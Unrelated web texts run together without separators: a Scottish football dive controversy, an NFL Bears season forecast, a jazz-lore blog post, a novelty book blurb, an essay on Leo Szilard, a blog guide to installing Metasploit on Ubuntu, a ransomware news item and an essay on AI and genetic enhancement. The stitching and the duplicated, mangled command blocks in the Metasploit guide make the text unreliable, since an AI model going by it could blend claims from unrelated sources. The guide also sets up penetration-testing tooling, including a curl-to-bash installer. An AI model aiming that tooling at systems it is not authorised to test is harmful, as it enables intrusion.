"And if I feel as though the SFA would punish me for any outburst about any referee then I'd walk away from football."
It was a high-profile game, a massive game. Surely they could change the officials and get the top officials? John Brown Dundee manager
Niall McGinn netted the equaliser from the penalty spot and the draw .
Aberdeen manager Derek McInnes has defended Pawlett against what his opponents thought was a theatrical dive when challenged by Lewis Toshney.
But the 22-year-old winger, who has previously been banned for diving, appears likely to be served with a notice of complaint from Scottish Football Association compliance officer Vincent Lunny.
And Brown claims he would substitute any player who won a penalty in such a way for his own team.
"I'd take him off right away," Brown told BBC Radio Scotland before highlighting the implications of the decision.
"I have never seen such a blatant a dive in a long time. The referee is 20 yards away, the assistant referee is just behind that. Surely he can see that?
"Dundee had an opportunity to take this down to another weekend and it was taken out of our hands by a diabolical decision. I'm still very bitter about it.
"It's our livelihoods. Players are going to lose their jobs, staff around Dens Park are possibly going to lose their jobs."
Pawlett also forced a good save from Steve Simonsen during Sunday's match
Brown, who recently signed a two-year contract, is unconcerned whether Pawlett faces retrospective action but thought the SFA had questions to answer.
"He is a young player and he's got previous, but you have officials out there to deal with that," Brown told Sportsound.
"It was a high-profile game, a massive game. Surely they could change the officials and get the top officials?
"It was a blatant dive. He was diving with two feet before he has even come near the player.
"I'm not too concerned about the player, I'm concerned about the officials. The officials are the ones that have cost us the game."
Brown argued that he had a right to be critical of decisions without being disciplined by the SFA.
"Maybe the guy's OK, a decent referee, but he made a massive mistake," he added.
"I've been happy with the referees. We had some dodgy decisions - in the cup game against Dundee United, the ball was out the park and they got a free-kick and got a goal from it.
"I've not complained about too many referees. In general, they have been spot-on.
"I had a gripe about yesterday because it was a major decision."
The Chicago Bears have a brutal three-game stretch -- Green Bay, Arizona and Seattle -- to begin the year. That hasn't changed. But much has since my original 7-9 prediction posted in April. Over the past four-plus months, the Bears released defensive end Ray McDonald, placed first-round pick Kevin White on the physically unable to perform list and suffered a rash of preseason injuries.
Expect the Bears to overachieve under head coach John Fox, but 7-9 might be pushing it. The Bears resemble a six-win team as opening weekend approaches.
Week 1: Sunday, Sept. 13, Green Bay, 1 p.m. ET
Ouch. Tough way to kick off the season. Aaron Rodgers is 12-3 against the Bears. Jay Cutler ... well, you know. Score: Packers 35, Bears 20. Record: 0-1.
Week 2: Sunday, Sept. 20, Arizona, 1 p.m. ET
Arizona is the better team on paper. But the NFL is funny. Expect the Bears to win a couple of games they have no business winning. This is one of them. Score: Bears 27, Cardinals 26. Record: 1-1.
Week 3: Sunday, Sept. 27, at Seattle, 4:25 p.m. ET
The Seahawks will give the Bears a dose of reality. Seattle is the toughest road venue in the league. Score: Seahawks 34, Bears 17. Record: 1-2.
Week 4: Sunday, Oct. 4, Oakland, 1 p.m. ET
Oakland is exactly the kind of team Cutler lights up. Vic Fangio's defense should be stable enough to contain the Raiders' offense. Score: Bears 30, Raiders 20. Record: 2-2.
Week 5: Sunday, Oct. 11, at Kansas City, 1 p.m. ET
Kansas City is a playoff contender in the AFC. The Bears' first trip to Arrowhead Stadium in 12 years ends in a close loss. Score: Chiefs 27, Bears 24. Record: 2-3.
Week 6: Sunday, Oct. 18, at Detroit, 1 p.m. ET
The Bears don't win at Ford Field in the rare years the Lions are good. Detroit still has plenty of talent coming off an 11-5 season. Score: Lions 34, Bears 20. Record: 2-4.
Week 7: BYE
Week 8: Sunday, Nov. 1, Minnesota, 1 p.m. ET
The Vikings are one of the NFL's most improved clubs. The Bears are not. Smart money now says that Minnesota sweeps the season series. Score: Vikings 28, Bears 21. Record: 2-5.
Week 9: Monday, Nov. 9, at San Diego, 8:30 p.m. ET
Surprise. Bears win at San Diego despite being massive underdogs. Cutler and Philip Rivers rekindle their old feud. Are the Bears back in the hunt? Score: Bears 30, San Diego 28. Record: 3-5.
Week 10: Sunday, Nov. 15, at St. Louis, 1 p.m. ET
No, the Bears are not back in the hunt. The Rams' defense almost pitches a shutout. The probability of another Kyle Long fight inside the Edward Jones Dome is strong. Score: Rams 28, Bears 6. Record: 3-6.
Week 11: Sunday, Nov. 22, Denver, 1 p.m. ET
Hey, Peyton Manning can still sling the football. That's unfortunate for the Bears. John Fox will have to wait for his revenge. Score: Broncos 40, Bears 30. Record: 3-7.
Week 12: Thursday, Nov. 26, at Green Bay, 8:30 p.m. ET
Brett Favre is getting his number retired on Thanksgiving? Uh, oh. Is Rodgers the quarterback for Green Bay? Uh, oh. Score: Packers 40, Bears 10. Record: 3-8.
Week 13: Sunday, Dec. 6, San Francisco, 1 p.m. ET
Fangio knows all of San Francisco's deepest, darkest secrets. Plus, who's left on the 49ers' roster? Score: Bears 28, 49ers 16. Record: 4-8.
Week 14: Sunday, Dec. 13, Washington, 1 p.m. ET
Cutler is better than Robert Griffin III. You think the Bears have problems? Yikes. Check out the Redskins. Score: Bears 30, Redskins 7. Record: 5-8.
Week 15: Sunday, Dec. 20, at Minnesota, 1 p.m. ET
Minnesota is playing for the wild card. The Bears are playing for another top-10 pick. Score: Vikings 30, Bears 7. Record: 5-9.
Week 16: Sunday, Dec. 27, at Tampa Bay, 1 p.m. ET
Take that, Lovie Smith. The Bears play loose and free and batter Jameis Winston or Mike Glennon, whoever is under center for the Bucs. By this point it won't matter. Score: Bears 27, Bucs 14. Record: 6-9.
Week 17: Sunday, Jan. 3, Detroit, 1 p.m. ET
Brighter days are ahead. The Bears fight hard, but Detroit has too much talent at wide receiver. Kind of like the Bears used to have, you know, back in July. Score: Lions 21, Bears 20. Record: 6-10.
“Did I ever tell you the one about Hank Mobley and the baseball?”
The best moments of the workday tend to begin with Don wandering past my desk with a sly smile and a knowing twinkle in his eyes. “Did I ever tell you?” he'll begin. I lean back in my chair. Don is offering more than a story: it is an invitation to an inner circle, the elite. Well, no — not quite a full invitation. I am only a spectator, allowed to gawk at his collection of jazz folklore but never quite privy to the whole thing. “You have to hear Charli tell it. Walter told it best, but he's not around.” I've been here long enough to know Don means Charli Persip and Walter Davis Jr. If I had to ask him to give me last names, I'd be out immediately. “Come on, Rachel. You know! Persip, Charli Persip, he's over here all the time,” I can imagine him chiding and shaking his head in disbelief. I'd have given myself up as a tourist and been promptly escorted back to the outside.
Jazz has a rich oral history; that goes without saying. Any historian could easily tell you that. But what that oral history is, exactly, rarely makes it into the books. Even if a historian was allowed access to one of the old cats's vault of stories, there'd be no way to prove any of it ever actually happened. “History” is really the wrong word for it: jazz history is the stuff in the books, the routine progression of Joplin to Bitches Brew, the rise of swing and the fall of bebop. Everyone knows jazz history.
But only the chosen few are privy to jazz myth. The myths aren't important because of their accuracy — their truth value is irrelevant and could never be fully determined anyways. Aside from being inherently amusing, the purpose of the jazz myth is to separate the initiates from the hangers-on, the posers, and the wannabes. And within the in-club, myths establish a hierarchy based on proximity to the deities: Bird, Trane, Miles, Monk. If their nicknames obscure their identities from those not in-the-know, even better. Like Greek mythology, there are minor deities, too — gods of particular instruments who don't command the same universal command as the major four. A first-person story about a jazz god places the speaker in direct proximity to a legend; from this proximity he derives his own mystic powers, his own legitimacy. Knowing a piece of old lore won't get you as much mileage, but if you tell it right, you can establish your place in the inner circle — the high priests of jazz, if you will. “I read once that Monk…” is the start of a story — a dubious and pretty irrelevant one, at that. “Toot once told me that Monk…” is the start of a top-notch myth. (Toot is T.S. Monk, Thelonious's son. If you say T.S., you're out again.)
I don't know much mythology yet. I probably never will — as a music publisher and rookie singer (a singer!), I'm still just a tourist with no creds of my own, no powers of authenticity. But I am a lucky one, and in my short career I've been in the right places at the right times to begin to parse the robust tapestry of jazz myth. I doubt I'll ever be one of the true initiates of the jazz elite: I got where I am because I met the right professor at Columbia. There's nothing less legitimate than an Ivy League kid who sneaks into the inner circle through connections, unless we're talking Wall Street, in which case that's all there is. But since jazz is as far away from Wall Street as you could get, I sit on my pot of jazz lore with the knowledge that having it does not elevate me in the hierarchy — I didn't hear these at the feet of the masters; they were told to me in interviews and workshops. Still, the fact that I can't claim a jazz lineage doesn't take away from the fact that they're great stories. They were shared with me most often interrupted by the storyteller's own laughter and usually followed with a nostalgic sigh, legends that are well-worn with repeated tellings that are slightly different each time. They're stories that are meant to be shared, to be passed on and on, losing a bit of their mysticism with each degree of separation but becoming no less enjoyable.
Most of my stories center around Monk: he once spent a whole visit with Bertha Hope lying in bed with his shoes and hat on and didn't say a word. They sat in total silence. After a while, Bertha got up to leave. “Nice seeing you,” Monk finally let out. Grachan Moncur told me that Monk would regularly skip out on bar tabs — “They won't care. They think I'm too crazy to notice, so I get to do whatever I want,” Monk said as he guided Grachan out of the bar. That one is likely my favorite, although it ties with a tale I heard from Kenny Washington about Philly Joe Jones singing on a gig with Jon Hendricks. Yes, Philly Joe was singing. He evidently got up to sing “It Had To Be You,” but never learned the lyrics. So he started, “It had to be you, it had to be you,” and then continued, “It had to be you, it had to be you, it had to be you…It had to be you, it had to be you…” for every line of the song.
As for Hank, he was evidently notoriously unathletic, but was goaded into a game of baseball by Charli and Walter, who were more interested in being boys than practicing all day like Hank. One hit a fly ball in Hank's direction, so he ran for it and yelled “I got it! I got it!” with his glove above his head. The ball went right by the glove and straight into Hank's face, giving him a split lip…on the very night that young Hank would be playing his first gig out of New Jersey — his first New York gig, with Max Roach no less. Hank was able to make the gig even with the split lip, but I can't imagine he played much ball after that.
(Sometimes Don will sprinkle his stories into commentary on our website, jazzleadsheets.com. His brief aside on “Soul Station” is a particularly nice one. Maybe buy a lead sheet while you're at it. I mean, not like I have any vested interest in it or anything.)
Advertisements
The Snuggie is a pop culture icon that quickly developed its own cult of awareness. Few of us were asking for a blanket with sleeves, but that's because we'd forgotten how to dream. Once we'd purchased our Snuggies, we quickly realized our world had changed for the better. Now, we want to show you just what makes the Snuggie cozy and sexy. Brilliantly illustrated with drawings of couples in flagrante delicto, our comprehensive guide includes―in ascending order of difficulty―everything from "The Warm and Snuggie" (for beginners) to "The Yes Ma'am" (perfect for hiding your flaws―not that you have any, of course!) to "The Night In" (which works great when you're staying home to page through The Snuggie Sutra).
Based on our blog of the same name, which scored mentions everywhere from The Tonight Show with Conan O'Brien to New York magazine and a host of radio stations all over the country, The Snuggie Sutra covers important topics like how to convince your partner to bring a Snuggie into the bedroom and how to set the Snuggie mood (candles and Snuggies don't mix!). We are thrilled to share this first-of-its-kind sexual handbook with the reading, Snuggie-wearing, and love-making public.
Enjoy!
--The Snuggie Sutrists
Leo Szilard was the man who first realised that nuclear power could be used to build a bomb of terrifying proportions. Lisa Jardine considers what his story has to say about the responsibilities of science.
The figure of Hungarian physicist Leo Szilard loomed large in our house when I was a child. He was held up to me as an exemplary figure in science - a man who had made fundamental breakthroughs in nuclear physics, but whose acute sense of moral probity led him in the end to denounce the very advances he had helped make. Only later did I learn an alternative version of his story.
Almost exactly 80 years ago, in early October 1933, Szilard was in London, in transit from Nazi Germany, when an idea came to him that would lead directly to the ultimate weapon of war - the atomic bomb.
An article in the Times two weeks earlier had reported a lecture at the British Association by Lord Rutherford - the Nobel Prize-winning New Zealand physicist and head of the Cavendish Laboratory in Cambridge. Rutherford had described splitting the atom by bombarding it with protons, but had gone on to say that any suggestion that the energy released might be harnessed as a source of power was "talking moonshine".
Find out more A Point of View is on Fridays on Radio 4 at 20:50 BST and repeated Sundays, 08:50 BST
Historian Lisa Jardine is professor of Renaissance studies at University College, London, where she is director of the Centre for Interdisciplinary Research in the Humanities Listen to A Point of View on the iPlayer BBC Podcasts - A Point of View
The report caught Szilard's attention. He pondered it obsessively. Surely Rutherford was wrong? Then, early on a dismal, grey morning, as he waited on foot at a traffic light to cross busy Southampton Row near his hotel, the answer came to him in a flash.
If a neutron, fired at an atom, produces the release of, say, two neutrons, each of which hits another atom, which both in turn release two more neutrons, which each go on to collide with two further atoms, a nuclear chain reaction would take place, releasing unimaginable amounts of energy.
Szilard tells this story twice, with slightly differing details. But the tale itself is consistent and delightfully vivid. The challenge of Rutherford's remark, the heavy cold that had prevented Szilard's attending the lecture, the days spent thinking about it and the flash of inspiration just as the traffic light changed.
Szilard immediately recognised the importance of his idea. To ensure its security he patented it in the name of the British Admiralty. The patent included a clear description of "neutron induced chain reactions to create explosions".
In August 1939, by which time Szilard had moved on to the US, he wrote to President Franklin Roosevelt to inform him that "a nuclear chain reaction in a large mass of uranium" was undoubtedly possible, and could lead to the construction of "extremely powerful bombs of a new type". Germany, he warned, might even now be developing such a weapon. "A single bomb of this type," he wrote, "carried by boat and exploded in a port, might very well destroy the whole port together with some of the surrounding territory."
Image caption Leo Szilard in 1945
The letter was signed by Szilard and Albert Einstein. By the time it reached Roosevelt, Germany had invaded Poland. With war now a certainty, the urgency was not lost on the US president. A committee was set up to pursue the nuclear initiative, out of which emerged what came to be known as the Manhattan Project - the hugely ambitious and massively funded programme to develop a functioning atomic bomb in the shortest possible time.
The dropping of the atomic bomb Two Japanese cities, Hiroshima and Nagasaki, were bombed on (respectively) 6 and 9 August 1945
Casualties have been estimated between 90,000 and 160,000 in Hiroshima, and at least 60,000 in Nagasaki. Roughly half of victims died within 24 hours of the blast
On 15 August Japan surrendered, bringing WWII to an end BBC History: The End of the War Against Japan A History of the World in 100 Objects: Hiroshima Jam Jar
But less than six years later in 1945, Szilard campaigned with equal passion to persuade the American government not to use the atomic bomb against a civilian population. He understood better than anyone the enormity of the devastation such a weapon could cause. But his petition, although signed by a large number of nuclear physicists, never reached the president.
So devastated was Szilard at his failure to avert the bombings of Hiroshima and Nagasaki (the story I was brought up on concluded) that he refused to do any further work in nuclear physics. Instead he moved research areas entirely, to molecular biology - a field concerned with the origins of life rather than its destruction. To my father this audacious step captured the essence of scientific moral responsibility. And I carried Szilard's story with me as I grew up.
Today, however, I know that inspiring as it is, there are problems with this tale. As often happens with history, we have to treat with caution a narrative that fits so neatly the interests and preoccupations of the age in which it is written.
At the time I was being told this story, Britain was in the depths of the Cold War. In the post-war years it turned out that Szilard (and indeed my own father) found it impossible to obtain work on any scientific project that involved nuclear physics. Though they were barely aware of the stigma themselves, the communist sympathies of their youth barred them from getting the necessary security clearance.
Image caption Szilard's wartime boss Gen Leslie Groves suspected him of Russian sympathies
So Szilard did not leave physics of his own accord. At the end of the war he was abruptly dismissed from the Manhattan Project by its military head, Gen Leslie Groves. Groves had always suspected him of having Russian sympathies, and now deemed him too high a security risk. Forced to change field, Szilard was indeed prescient in choosing molecular biology, which less than a decade later would uncover "the secret of life" in the form of the structure of DNA.
My father's exemplary tale unravels further when we consider the way it presents the progress towards a functioning atomic bomb. It narrates a smooth development from Rutherford's lecture in London, through Szilard's (and his fellow emigres') journey from Nazi Germany via London to the US, and Szilard's single-minded preoccupation with the potential threat of nuclear weapons, to the Manhattan Project, and finally to its very American triumphant - or tragic - outcome.
But actually Szilard the Hungarian had carried out the crucial early research with the Italian emigre Enrico Fermi, continuing it with him in the early years of the Manhattan Project, where the two of them succeeded in creating a controlled chain reaction - a prerequisite for a functioning bomb. Meanwhile, independently in Britain considerable progress was being made towards a nuclear weapon (a project code-named "Tube Alloys") with the direct encouragement of the prime minister Winston Churchill (who as Graham Farmelo tells us in a recent book, was surprisingly up-to-date himself in nuclear physics). In September 1940 the so-called Tizard mission delivered the top secret work of Tube Alloys to the Americans, to be developed with the greater manpower and financial resources available in the US. The British work made its own vital contribution to the project.
Image caption Trinity monument in US state of New Mexico - site of the first atomic bomb test
Here is a much more fragmented, syncopated and international story, in which it is entirely unclear whether any one nation ultimately takes the credit or blame for the science and engineering behind the atomic bomb. Nor does it carry the clear didactic message of my original.
Jacob Bronowski Scientist, writer and broadcaster (1908-74)
Born in Poland, but spent most of his life in England
Became famous for landmark BBC TV series The Ascent of Man (1973), telling story of mankind through scientific achievement
Lisa Jardine is eldest of Bronowski's four daughters Desert Island Discs: Jacob Bronowski Interview with Michael Parkinson (1974)
There is one final twist to what started out as a simple story. Some of you will have noticed that I gave the date of Szilard's eureka moment at that traffic light on Southampton Row as October 1933. You may have had a date in September in your mind. The truth is, Szilard tells the story twice, as I mentioned. In one version he records reading the Times report and immediately having the idea of a chain reaction (on 12 September). In the other he recalls fretting over the problem for weeks in his hotel room and pacing the streets of London deep in thought, until the idea eventually came to him (in early October).
So although the beginning of the story comes from the mouth of the man himself, we cannot be certain which version is correct. As a historian I have chosen the second as the more plausible, particularly in view of that heavy cold which Szilard tells us prevented his attending Rutherford's lecture on 11 September. But that remains surmise.
Historical narratives are never without their agendas. My father's generation lived under the shadow of Hiroshima and Nagasaki - he had been sent to do reconnaissance there only a few months after the bombs were dropped and had seen the consequences all too close up. He told me a story which redeemed the scientist from the enormity of events brought about by fundamental research in physics. It was a story that held the scientist responsible for lethal applications of "pure" research, and proposed Szilard as an iconic figure, for recognising and taking that responsibility upon himself.
My father's story of Leo Szilard may not have been the truth. But it taught me, as a child, a lasting, salutary lesson about science and human values.
You can follow the Magazine on Twitter and on Facebook
Advertisement
White hat or Black hat, hacking demands good grasp of all sysadmin works. The usage style we show on this website are intended for testing security of own servers – that is white hat way. We have a list of essential security tools for GNU/Linux servers. Metasploit framework needs Ruby, Postgre SQL, Java etc. Here is how to install Metasploit on Ubuntu 16.04 LTS to test security of servers.
Off Topic Warning : I am not teaching you moral science. Guides on this website are not designed to confer security a real black hat hacker needs in real situation. For black hat hacking you really need custom hardware and someone's internet connection as long you are not working as Governmental agent for developing spyware, data theft etc. Goverment black hat can go up to sending some army and pushing few bullets inside your head upon suspicion, anger etc. Not funny.
How To Install Metasploit on Ubuntu 16.04 LTS To Test Security
We need to update, upgrade and install the dependencies :
apt update apt upgrade apt install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev 1 2 3 apt update apt upgrade apt install build - essential libreadline - dev libssl - dev libpq5 libpq - dev libreadline5 libsqlite3 - dev libpcap - dev git - core autoconf postgresql pgadmin3 curl zlib1g - dev libxml2 - dev libxslt1 - dev vncviewer libyaml - dev curl zlib1g - dev
We will install Oracle Java :
sudo add-apt-repository -y ppa:webupd8team/java apt update apt install oracle-java8-installer 1 2 3 sudo add - apt - repository - y ppa : webupd8team / java apt update apt install oracle - java8 - installer
We need to install nmap, we can run :
apt install nmap 1 apt install nmap
Or can build from source :
cd /opt git clone https://github.com/nmap/nmap.git cd nmap ./configure make sudo make install make clean 1 2 3 4 5 6 7 cd / opt git clone https : / / github . com / nmap / nmap . git cd nmap . / configure make sudo make install make clean
We will install Ruby (using RVM; if you are new to Ruby, you can perform a search on how to install Ruby), I install in this way on server (I used same steps for Nikto & WPScan). Make sure all dependencies are installed :
Advertisement ---
apt install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev 1 apt install libcurl4 - openssl - dev libxml2 libxml2 - dev libxslt1 - dev ruby - dev build - essential libgmp - dev zlib1g - dev
We can install with RVM, this is unsafe method, not really for production website for other purpose but unlikely to give any warning or issue, you'll run as root :
cd ~ curl -sSL https://rvm.io/mpapis.asc | gpg --import - gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 \curl -sSL https://get.rvm.io | bash -s stable --rails source /usr/local/rvm/scripts/rvm echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc source ~/.bashrc rvm install 2.4.0 rvm use 2.4.0 --default echo "gem: --no-ri --no-rdoc" > ~/.gemrc git clone https://github.com/wpscanteam/wpscan.git cd wpscan gem install bundler bundle install --without test 1 2 3 4 5 6 7 8 9 10 11 12 13 14 cd ~ curl - sSL https : / / rvm . io / mpapis . asc | gpg -- import - gpg -- keyserver hkp : / / keys . gnupg . net -- recv - keys 409B6B1796C275462A1703113804BB82D39DC0E3 \ curl - sSL https : / / get . rvm . io | bash - s stable -- rails source / usr / local / rvm / scripts / rvm echo "source /usr/local/rvm/scripts/rvm" >> ~ / . bashrc source ~ / . bashrc rvm install 2.4.0 rvm use 2.4.0 -- default echo "gem: --no-ri --no-rdoc" > ~ / . gemrc git clone https : / / github . com / wpscanteam / wpscan . git cd wpscan gem install bundler bundle install -- without test
Next step is preparing PosgreSQL, a detailed guide here :
https://fedoraproject.org/wiki/Metasploit_Postgres_Setup 1 https : / / fedoraproject . org / wiki / Metasploit_Postgres_Setup
In short, you need to run these commands, where msf is database name, username :
sudo -s su postgres createuser msf -P -S -R -D createdb -O msf msf exit exit 1 2 3 4 5 6 sudo - s su postgres createuser msf - P - S - R - D createdb - O msf msf exit exit
As final step, install Metaexploit framework :
cd /opt sudo git clone https://github.com/rapid7/metasploit-framework.git sudo chown -R `whoami` /opt/metasploit-framework cd metasploit-framework rvm --default use ruby-${RUByVERSION}@metasploit-framework gem install bundler bundle install sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' 1 2 3 4 5 6 7 8 cd / opt sudo git clone https : / / github . com / rapid7 / metasploit - framework . git sudo chown - R ` whoami ` / opt / metasploit - framework cd metasploit - framework rvm -- default use ruby - $ { RUByVERSION } @metasploit - framework gem install bundler bundle install sudo bash - c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
Armitage is a Java tool for management from Desktop with GUI or VNC :
http://www.fastandeasyhacking.com 1 http : / / www . fastandeasyhacking . com
Of course there is official guide :
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment 1 https : / / github . com / rapid7 / metasploit - framework / wiki / Setting - Up - a - Metasploit - Development - Environment
If you run :
msfconsole 1 msfconsole
Metaexploit framework will start and you'll get a command prompt like this:
msf > 1 msf >
This Article Has Been Shared 9244 Times! Google+ Pinterest
About Abhishek Ghosh is a Businessman, Orthopaedic Surgeon, Author and Blogger. You can keep touch with him on Google Plus - Abhishek Ghosh1 and on Twitter - @AbhishekCTRL.
In a world rocked by hackers, trolls and online evildoers of all stripes, the good people of the internet have long looked for a hero who would refuse to back down. Finally, someone has said enough is enough. And that someone is the government of Mecklenburg County, N.C.
The county, which includes the city of Charlotte, said on Wednesday that it would not pay a $23,000 ransom to a group of hackers who seized control of several government computer systems. The breach was announced on Tuesday when the county government said on Twitter that it was “experiencing a computer-system outage.”
“I am confident that our backup data is secure and we have the resources to fix this situation ourselves,” Dena R. Diorio, the Mecklenburg County manager, said in a statement on Wednesday. “It will take time, but with patience and hard work, all of our systems will be back up and running as soon as possible.”
Mecklenburg is the most populous county in North Carolina, and the attack compromised many of its systems. But on Wednesday it said it was “open for business, albeit somewhat slower with limited access to systems.” Without the internet, civil servants were doing their jobs using “paper processes,” it said.
When it comes to artificial intelligence, we may all be suffering from the fallacy of availability: thinking that creating intelligence is much easier than it is, because we see examples all around us. In a recent poll, machine intelligence experts predicted that computers would gain human-level ability around the year 2050, and superhuman ability less than 30 years after.1 But, like a tribe on a tropical island littered with World War II debris imagining that the manufacture of aluminum propellers or steel casings would be within their power, our confidence is probably inflated.
AI can be thought of as a search problem over an effectively infinite, high-dimensional landscape of possible programs. Nature solved this search problem by brute force, effectively performing a huge computation involving trillions of evolving agents of varying information processing capability in a complex environment (the Earth). It took billions of years to go from the first tiny DNA replicators to Homo Sapiens. What evolution accomplished required tremendous resources. While silicon-based technologies are increasingly capable of simulating a mammalian or even human brain, we have little idea of how to find the tiny subset of all possible programs running on this hardware that would exhibit intelligent behavior.
But there is hope. By 2050, there will be another rapidly evolving and advancing intelligence besides that of machines: our own. The cost to sequence a human genome has fallen below $1,000, and powerful methods have been developed to unravel the genetic architecture of complex traits such as human cognitive ability. Technologies already exist which allow genomic selection of embryos during in vitro fertilization—an embryo's DNA can be sequenced from a single extracted cell. Recent advances such as CRISPR allow highly targeted editing of genomes, and will eventually find their uses in human reproduction.
It is easy to forget that the computer revolution was led by a handful of geniuses: individuals with truly unusual cognitive ability.
The potential for improved human intelligence is enormous. Cognitive ability is influenced by thousands of genetic loci, each of small effect. If all were simultaneously improved, it would be possible to achieve, very roughly, about 100 standard deviations of improvement, corresponding to an IQ of over 1,000. We can't imagine what capabilities this level of intelligence represents, but we can be sure it is far beyond our own. Cognitive engineering, via direct edits to embryonic human DNA, will eventually produce individuals who are well beyond all historical figures in cognitive ability. By 2050, this process will likely have begun.
Also in Artificial Intelligence Is Already Weirdly Inhuman By David Berreby Nineteen stories up in a Brooklyn office tower, the view from Manuela Veloso's office—azure skies, New York Harbor, the Statue of Liberty—is exhilarating. But right now we only have eyes for the nondescript windows below us in the tower across...READ MORE
These two threads—smarter people and smarter machines—will inevitably intersect. Just as machines will be much smarter in 2050, we can expect that the humans who design, build, and program them will also be smarter. Naively, one would expect the rate of advance of machine intelligence to outstrip that of biological intelligence. Tinkering with a machine seems easier than modifying a living species, one generation at a time. But advances in genomics—both in our ability to relate complex traits to the underlying genetic codes, and the ability to make direct edits to genomes—will allow rapid advances in biologically-based cognition. Also, once machines reach human levels of intelligence, our ability to tinker starts to be limited by ethical considerations. Rebooting an operating system is one thing, but what about a sentient being with memories and a sense of free will?
Therefore, the answer to the question “Will AI or genetic modification have the greater impact in the year 2050?” is yes. Considering one without the other neglects an important interaction.
Alfred Eisenstaedt/The LIFE Picture Collection/Getty Images
It has happened before. It is easy to forget that the computer revolution was led by a handful of geniuses: individuals with truly unusual cognitive ability. Alan Turing and John von Neumann both contributed to the realization of computers whose program is stored in memory and can be modified during execution. This idea appeared originally in the form of the Turing Machine, and was given practical realization in the so-called von Neumann architecture of the first electronic computers, such as the EDVAC. While this computing design seems natural, even obvious, to us now, it was at the time a significant conceptual leap.
Turing and von Neumann were special, and far beyond peers of their era. Both played an essential role in the Allied victory in WWII. Turing famously broke the German Enigma codes, but not before conceptualizing the notion of “mechanized thought” in his Turing Machine, which was to become the main theoretical construct in modern computer science. Before the war, von Neumann placed the new quantum theory on a rigorous mathematical foundation. As a frequent visitor to Los Alamos he made contributions to hydrodynamics and computation that were essential to the United States' nuclear weapons program. His close colleague, the Nobel Laureate Hans A. Bethe, established the singular nature of his abilities, and the range of possibilities for human cognition, when he said “I always thought von Neumann's brain indicated that he was from another species, an evolution beyond man.”
Today, we need geniuses like von Neumann and Turing more than ever before. That's because we may already be running into the genetic limits of intelligence. In a 1983 interview, Noam Chomsky was asked whether genetic barriers to further progress have become obvious in some areas of art and science.2 He answered:
You could give an argument that something like this has happened in quite a few fields ... I think it has happened in physics and mathematics, for example ... In talking to students at MIT, I notice that many of the very brightest ones, who would have gone into physics twenty years ago, are now going into biology. I think part of the reason for this shift is that there are discoveries to be made in biology that are within the range of an intelligent human being. This may not be true in other areas.
AI research also pushes even very bright humans to their limits. The frontier machine intelligence architecture of the moment uses deep neural nets: multilayered networks of simulated neurons inspired by their biological counterparts. Silicon brains of this kind, running on huge clusters of GPUs (graphical processor units made cheap by research and development and economies of scale in the video game industry), have recently surpassed human performance on a number of narrowly defined tasks, such as image or character recognition. We are learning how to tune deep neural nets using large samples of training data, but the resulting structures are mysterious to us. The theoretical basis for this work is still primitive, and it remains largely an empirical black art. The neural networks researcher and physicist Michael Nielsen puts it this way:3
... in neural networks there are large numbers of parameters and hyper-parameters, and extremely complex interactions between them. In such extraordinarily complex systems it's exceedingly difficult to establish reliable general statements. Understanding neural networks in their full generality is a problem that, like quantum foundations, tests the limits of the human mind.
The detailed inner workings of a complex machine intelligence (or of a biological brain) may turn out to be incomprehensible to our human minds—or at least the human minds of today. While one can imagine a researcher “getting lucky” by stumbling on an architecture or design whose performance surpasses her own capability to understand it, it is hard to imagine systematic improvements without deeper comprehension.
SSPL/Getty Images
But perhaps we will experience a positive feedback loop: Better human minds invent better machine learning methods, which in turn accelerate our ability to improve human DNA and create even better minds. In my own work, I use methods from machine learning (so-called compressed sensing, or convex optimization in high dimensional geometry) to extract predictive models from genomic data. Thanks to recent advances, we can predict a phase transition in the behavior of these learning algorithms, representing a sudden increase in their effectiveness. We expect this transition to happen within about a decade, when we reach a critical threshold of about 1 million human genomes worth of data. Several entities, including the U.S. government's Precision Medicine Initiative and the private company Human Longevity Inc. (founded by Craig Venter), are pursuing plans to genotype 1 million individuals or more.
The feedback loop between algorithms and genomes will result in a rich and complex world, with myriad types of intelligences at play: the ordinary human (rapidly losing the ability to comprehend what is going on around them); the enhanced human (the driver of change over the next 100 years, but perhaps eventually surpassed); and all around them vast machine intellects, some alien (evolved completely in silico) and some strangely familiar (hybrids). Rather than the standard science-fiction scenario of relatively unchanged, familiar humans interacting with ever-improving computer minds, we will experience a future with a diversity of both human and machine intelligences. For the first time, sentient beings of many different types will interact collaboratively to create ever greater advances, both through standard forms of communication and through new technologies allowing brain interfaces. We may even see human minds uploaded into cyberspace, with further hybridization to follow in the purely virtual realm. These uploaded minds could combine with artificial algorithms and structures to produce an unknowable but humanlike consciousness. Researchers have recently linked mouse and monkey brains together, allowing the animals to collaborate—via an electronic connection—to solve problems. This is just the beginning of “shared thought.”
It may seem incredible, or even disturbing, to predict that ordinary humans will lose touch with the most consequential developments on planet Earth, developments that determine the ultimate fate of our civilization and species. Yet consider the early 20th-century development of quantum mechanics. The first physicists studying quantum mechanics in Berlin—men like Albert Einstein and Max Planck—worried that human minds might not be capable of understanding the physics of the atomic realm. Today, no more than a fraction of a percent of the population has a good understanding of quantum physics, although it underlies many of our most important technologies: Some have estimated that 10-30 percent of modern gross domestic product is based on quantum mechanics. In the same way, ordinary humans of the future will come to accept machine intelligence as everyday technological magic, like the flat screen TV or smartphone, but with no deeper understanding of how it is possible.
New gods will arise, as mysterious and familiar as the old.
Stephen Hsu is Vice-President for Research and Professor of Theoretical Physics at Michigan State University. He is also a scientific advisor to BGI (formerly, Beijing Genomics Institute) and a founder of its Cognitive Genomics Lab.
References
1. Müller, V.C. & Bostrom, N. Future progress in artificial intelligence: A survey of expert opinion. AI Matters 1, 9-11 (2014).
2. Gliedman, J. Things no amount of learning can teach. Omni Magazine 6, 112- 119 (1983).
